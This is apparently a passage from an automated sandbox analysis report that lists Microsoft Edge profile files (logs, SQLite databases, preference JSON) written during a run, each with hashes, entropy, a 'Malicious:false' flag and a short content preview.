                                                                                                                                                                                                                                                                                          SHA-512:E922F6BE36D37DB387165321BBE1778F38A240E4B33ECFDFFF7057D23956BB8C17591829A5E2B885CBE2AC5D3DEFAD0F8E7DE8C25133E0D4DD1C17C3F707E395
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.100 754 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/31-10:59:17.116 754 Recovering log #3.2024/12/31-10:59:17.117 754 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):325
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.21225022620582
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5vo1q2P923oH+TcwtpIFUt8Mm3JZmw+MBjkwO923oH+Tcwta/WLJ:5o1v4YebmFUt8zJ/+wj5LYebaUJ
                                                                                                                                                                                                                                                                                          MD5:BD90687DA4FE304D162BB4A6956BAA68
                                                                                                                                                                                                                                                                                          SHA1:DB6C7A4E5350D7508BA9A97811C2AB9681FF057B
                                                                                                                                                                                                                                                                                          SHA-256:418EAD597CBA26B4DB2A0B6E28A01650087D9C244C719B0B521AA14D1F4CF11D
                                                                                                                                                                                                                                                                                          SHA-512:E922F6BE36D37DB387165321BBE1778F38A240E4B33ECFDFFF7057D23956BB8C17591829A5E2B885CBE2AC5D3DEFAD0F8E7DE8C25133E0D4DD1C17C3F707E395
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.100 754 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/31-10:59:17.116 754 Recovering log #3.2024/12/31-10:59:17.117 754 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.2649203283896402
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:8/2qOB1nxCkMbSAELyKOMq+8yC8F/YfU5m+OlTLVumA:Bq+n0Jb9ELyKOMq+8y9/OwX
                                                                                                                                                                                                                                                                                          MD5:50E83BD889B028D25AEC0FF542C73E51
                                                                                                                                                                                                                                                                                          SHA1:CFB58A65011C3D03D1EBBCF63241B98D300D6A5E
                                                                                                                                                                                                                                                                                          SHA-256:473E1D65B83D254E2D8289EDEC15E87D7D92DDD98DE3E5D58B690DACFA2C3DEB
                                                                                                                                                                                                                                                                                          SHA-512:4CD58B04B203824653C928A1DC0FD6082668B9715C29B714AAB8EA128CB33046ED0483869A1EE538892C57402773EA44552A295F445FBE874FE44ABA54F62F0D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.4664774146274781
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0c8QgbqT:v7doKsKuKZKlZNmu46yjx0UiQ
                                                                                                                                                                                                                                                                                          MD5:5845D2B4545A1B873A5DC95C3BE923ED
                                                                                                                                                                                                                                                                                          SHA1:864845F2E385980AA7588022F8CB29632E2690FF
                                                                                                                                                                                                                                                                                          SHA-256:657FA93800206A128EF42A6D2A1776ADFA296B71707EBF820BFC9DC7A961A064
                                                                                                                                                                                                                                                                                          SHA-512:3DF2757E5AD643F262FD5E5DE3613FFFEA44D403FCB6DF3EEA642A324D03E6617B6784198D1E6AC24A1F6AA8E68D34C084FDEA72F6564C7BFA0DB581CD899999
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a8bdbcc1-4d3d-49a2-b3c4-fdf11df14cc0.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):28366
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.556999534773399
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:EIr4/27pLGLhloWPqIftA8F1+UoAYDCx9Tuqh0VfUC9xbog/OVWHtzHrw9pCtuW:EIr4/WchloWPqIftAu1janNzUWtR
                                                                                                                                                                                                                                                                                          MD5:62BA76A3BB5746514FE95F11510A4E40
                                                                                                                                                                                                                                                                                          SHA1:AE4291A10A01FF9E26AE77558E3E4109399205FE
                                                                                                                                                                                                                                                                                          SHA-256:5E4430F24C2BDA78DDCCB61CF82FFEDAAE60B2B93EC05B69A8F75CE82A7DB541
                                                                                                                                                                                                                                                                                          SHA-512:9A7DF3773A947C01B67A2DF040AF7214FA310B9B3E5E7753E44B60A084B08ADBC3EC003B56D38BBEC02143F714BE80110576167CA07B792EEFFB1089B3DDA946
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380134357125805","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380134357125805","location":5,"ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11755
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                          MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                          SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                          SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                          SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\bec71301-9a33-46bd-a7c2-7cbe8cbd14b0.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c7691eaa-fbc4-4224-b676-e85cde02421d.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (14940), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):14946
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.482025619716692
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:stlQysInfhlCgwDuS1yMYbGvQw/6WVlaTYc:sLdnfqgJbG40XaTYc
                                                                                                                                                                                                                                                                                          MD5:DC35FDE4D68E10C5ABC6F143398D647A
                                                                                                                                                                                                                                                                                          SHA1:83A9DC04039013D8FC6A325BD8FB6B153903177A
                                                                                                                                                                                                                                                                                          SHA-256:85D9FEE42BBCECFDA7C0582F179925027F6A2C4F1BE309CC3A742B81F4F9BCDA
                                                                                                                                                                                                                                                                                          SHA-512:6A96BBCCB4CE5FB431A18831EF74B0A602A5B8CB3D6839BE6C80BAC9912CF84BC19AD49BE07B10A3291A0FD17A416D32375F5718DAD0875E1E1414CFABC14F1C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380134357689834","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c7c68b92-b616-4304-9b27-86c7a326e3c6.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):30244
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.565425423032338
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:EIr4/27pLGLhloWPqIfqA8F1+UoAYDCx9Tuqh0VfUC9xbog/OVSq5HtzHrw4pCtD:EIr4/WchloWPqIfqAu1jaTq5NzUptD
                                                                                                                                                                                                                                                                                          MD5:5595CBEBC1DCE45B1E26CE8B090F04B2
                                                                                                                                                                                                                                                                                          SHA1:5DF0D6A9233DE94C17CC11F5651503856EE7BF7C
                                                                                                                                                                                                                                                                                          SHA-256:E8CF8104412AEC606B733042F762EC89A3EC47E7CEBDD3B1EFAA72B642E64042
                                                                                                                                                                                                                                                                                          SHA-512:DFA4C560460274B80F9D723DACB60D571144DEE60AA8716F07CD14D9B09F012891FD7144D9B47A9E9A22AC6D31C92B57D432553973BBC8B8F97A8284011418E4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380134357125805","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380134357125805","location":5,"ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                          MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                          SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                          SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                          SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.10222192265166918
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:Gu0a00aC89XCChslotGLNl0ml/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Uf:+K3spEjVl/PnnnnnnnnnnnvoQ/Eou
                                                                                                                                                                                                                                                                                          MD5:4C1D9A26785ADE6197678800099B7617
                                                                                                                                                                                                                                                                                          SHA1:B22377FBF6B9CA0DF0D4A43D0237DCA7C91A9D2A
                                                                                                                                                                                                                                                                                          SHA-256:685BA1A0158852DC86962134DBC31AE5650FCCCA02FB0E9DDE7535F34214F90C
                                                                                                                                                                                                                                                                                          SHA-512:F56D11F1A121B495294C1BDBC82AECB76C83E4061D59A918918F75DBA9324EE0A248C86A9254A2ECD890C59ED43332FDC00F92379B9C489774E178E6276BBABC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..-.............M........@..>.?.4..}....1....N..-.............M........@..>.?.4..}....1....N........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):317272
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8920725097299096
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:G20KlYNUblfyxh4TqpzvOIQ7S1Asv8+UyQyJ+y1yDoy1xyQx:r3hV
                                                                                                                                                                                                                                                                                          MD5:E207C2CCD99419CBDCB449A2EA8B8D02
                                                                                                                                                                                                                                                                                          SHA1:466373E362003ECE4E094F44300071F887F538C1
                                                                                                                                                                                                                                                                                          SHA-256:F3788A407D4B1D6D172FB97F294D92F9B466EEC0BC45AE2258AE2630D059EED3
                                                                                                                                                                                                                                                                                          SHA-512:D95A6DCA53172FE84970945F9197602CF759106B7BE1B95FBA3A5F2D0D1CD0FD6DD75AD0D44FAA336AF7C57CE67A11FDC473BF3D20742A764075EB029620D12B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):694
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.538046789262752
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:Wlc8NOuuuuuuuuuuuuuuuuuuuuusUllDx7BDO8u:iDW8lDx7xS
                                                                                                                                                                                                                                                                                          MD5:E5AF9C4B9F90D39BB5E66889DBE8C21C
                                                                                                                                                                                                                                                                                          SHA1:1AACDAF878F6F524752B537E4252948175626DB6
                                                                                                                                                                                                                                                                                          SHA-256:54B6F36885C0290714BBF984ACC2CA465C60C961B3335A6B7F45666A4934516A
                                                                                                                                                                                                                                                                                          SHA-512:44244CA9460BB0405406A43CCBED6D132A7D1F91BE7FE412099221D0E0AAA2AC64043AC4B37DC20B1DC734F487DCD672E4A3070D430136CF0DCC41A35B780492
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...................;...............#38_h.......6.Z..W.F..........................V.e................V.e..................u.0................39_config..........6.....n ...1

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.266376241585352
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5ctVFwVq2P923oH+TcwtfrK+IFUt8MctVFwgZmw+MJgIkwO923oH+TcwtfrUeLJ:2Ov4Yeb23FUt83X/+Ij5LYeb3J
                                                                                                                                                                                                                                                                                          MD5:53DB8976C21581EB6B9D4DB173D6991E
                                                                                                                                                                                                                                                                                          SHA1:F365FAC1303C3B1DA3A8EEA9E89FB1F297B95BDF
                                                                                                                                                                                                                                                                                          SHA-256:213B76F22EA4A8C8B105A004AC5810DB315E6041577A136E409C0C14F0237364
                                                                                                                                                                                                                                                                                          SHA-512:880B0D4763100EA74681F2D83371C0B3573E3C520EDA524C5536C9CAC1F5FFF662DB895F27B9ED8232E938A240295373604BF115FAABB9BAD0B3C082AF1DB6D4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.697 6f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/31-10:59:17.697 6f0 Recovering log #3.2024/12/31-10:59:17.698 6f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.266376241585352
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5ctVFwVq2P923oH+TcwtfrK+IFUt8MctVFwgZmw+MJgIkwO923oH+TcwtfrUeLJ:2Ov4Yeb23FUt83X/+Ij5LYeb3J
                                                                                                                                                                                                                                                                                          MD5:53DB8976C21581EB6B9D4DB173D6991E
                                                                                                                                                                                                                                                                                          SHA1:F365FAC1303C3B1DA3A8EEA9E89FB1F297B95BDF
                                                                                                                                                                                                                                                                                          SHA-256:213B76F22EA4A8C8B105A004AC5810DB315E6041577A136E409C0C14F0237364
                                                                                                                                                                                                                                                                                          SHA-512:880B0D4763100EA74681F2D83371C0B3573E3C520EDA524C5536C9CAC1F5FFF662DB895F27B9ED8232E938A240295373604BF115FAABB9BAD0B3C082AF1DB6D4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/31-10:59:17.697 6f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/31-10:59:17.697 6f0 Recovering log #3.2024/12/31-10:59:17.698 6f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):787
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                          MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                          SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                          SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                          SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):339
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.240928568131308
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5tTcVq2P923oH+TcwtfrzAdIFUt8MeSgZmw+MeSIkwO923oH+TcwtfrzILJ:PTkv4Yeb9FUt8x/+r5LYeb2J
                                                                                                                                                                                                                                                                                          MD5:737233CB439A62E11D7755870BF2A675
                                                                                                                                                                                                                                                                                          SHA1:9BC43B794D61E9083A049B6180156B1BEB49FDD8
